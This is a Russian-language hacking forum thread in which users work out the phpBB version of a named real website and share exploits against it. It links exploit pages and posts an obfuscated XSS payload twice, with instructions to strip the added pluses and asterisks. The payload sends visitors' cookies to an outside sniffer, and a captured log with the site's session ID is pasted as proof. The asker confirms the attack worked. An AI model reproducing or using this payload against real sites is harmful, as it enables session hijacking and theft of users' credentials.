Хотел спросить какая это весия phpBB?
http://www.onboardmagazine.ru/forum/
И если под эту версию эксплоит?Заранее всем спасибо:)

Предположу, что версия 2.0.19
А так, читай этот топ - http://forum.antichat.ru/thread18918.html
Потом, как определишь примерную версию лезишь сюда - http://forum.antichat.ru/thread12610.html
И будет тебе счастье...

А highlight баг случайно не в версии 2.0.19?

Вот тебе сплойты под версию 2.0.19

_http://milw0rm.com/exploits/1457
_http://milw0rm.com/exploits/1469
_http://milw0rm.com/exploits/1661

Также глянь тут (http://www.securitylab.ru/vulnerability/page1_6.php?arrFilter_ff%5BSECTION_ID%5D=&arrFilter_ff%5BSEARCHABLE_CONTENT%5D=phpbb+2.0.19&set_filter=Y)

Версия этого форума 2.0.18
В это версии есть XSS

[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL]

Что бы воспользоваться сплойтом убираем плюсы между символами & и #(например было "&+#40" стало -"(")

Потом иди на снифер античата и лови куки :)

Коллега, Вы правы )
Проверил эту xss, работает, значит версия не выше 2.0.18...
Так что дерзай, автор топика...

чтото у меня хсска не прокатила((
p.s плюсы убрал
мож что еще надо сделать???

чтото у меня хсска не прокатила((
p.s плюсы убрал
мож что еще надо сделать???

Все работает...еще раз только что проверил...
Вводишь с тексте сообщения
[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL]

Не забываем убирать плюсы и звездочки...
Заходишь сюда затем - http://antichat.ru/sniff/log.php
Как доказательство того, что работает:

[Sat Oct 28 15:12:47 2006] IP=83.237.**.*** SITE=www.onboardmagazine.ru
REFERER=http://www.onboardmagazine.ru/forum/posting.php
QUERY=phpbb2mysql_data=a:2:{s:11:"autologinid";s:0:"";s:6:"userid";i:-1;}; phpbb2mysql_sid=56b611340396fa83c6aa7ef95c10aaff; phpbb2mysql_data=a:2:{s:11:"autologinid";s:0:"";s:6:"userid";i:-1;}
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Если опять не получится стучи в асю...помогу...
Ах да...забыл еще сказать...наврядли у тебя получится заполучить куки админа потому как наврядли он вовсе свой форум посещает...
Форум запустили...там рекламы больше чем обычных постов...

ооо всё прокатило.
оказывается надобыло через експлорер зайти..
а через оперу не катит

_http://www.onboardmagazine.ru/forum/docs/INSTALL.html